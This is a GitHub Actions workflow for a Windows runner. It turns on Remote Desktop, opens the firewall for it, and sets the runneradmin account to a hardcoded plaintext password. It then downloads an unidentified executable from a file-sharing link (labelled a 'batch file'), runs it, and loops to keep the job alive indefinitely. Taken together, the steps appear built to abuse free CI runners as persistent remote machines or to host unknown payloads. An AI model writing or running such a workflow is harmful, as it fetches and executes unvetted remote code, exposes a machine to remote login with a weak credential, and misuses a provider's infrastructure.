name: last

on: [push, workflow_dispatch]

jobs:
  build:
    runs-on: windows-latest
    steps:
      - name: Enable TS
        run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0

      - name: Enable Firewall Rule
        run: Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

      - name: Set User Authentication
        run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name "UserAuthentication" -Value 1

      - name: Set Runner Admin Password
        run: Set-LocalUser -Name "runneradmin" -Password (ConvertTo-SecureString -AsPlainText "P@ssw0rd!" -Force)

      - name: Download Batch File
        run: Invoke-WebRequest -Uri "https://sharedby.blomp.com/qkOKD6" -OutFile run.exe

      - name: Execute Batch File
        run: |
          Start-Process -FilePath "run.exe"
          while ($true) {
              if (Get-Process | Where-Object { $_.ProcessName -eq "run" }) {
                  Write-Host "Process is running. Keeping alive..."
              } else {
                  Write-Host "Process has exited. Exiting loop..."
                  break
              }
              Start-Sleep -Seconds 300
          }

      - name: Keep Workflow Alive
        run: |
          Write-Host "Keeping the workflow alive indefinitely..."
          while ($true) {
              # Periodically output to keep the runner active
              Write-Host "Workflow is alive... Sleeping for 5 minutes."
              Start-Sleep -Seconds 300 # Sleep for 5 minutes
          }
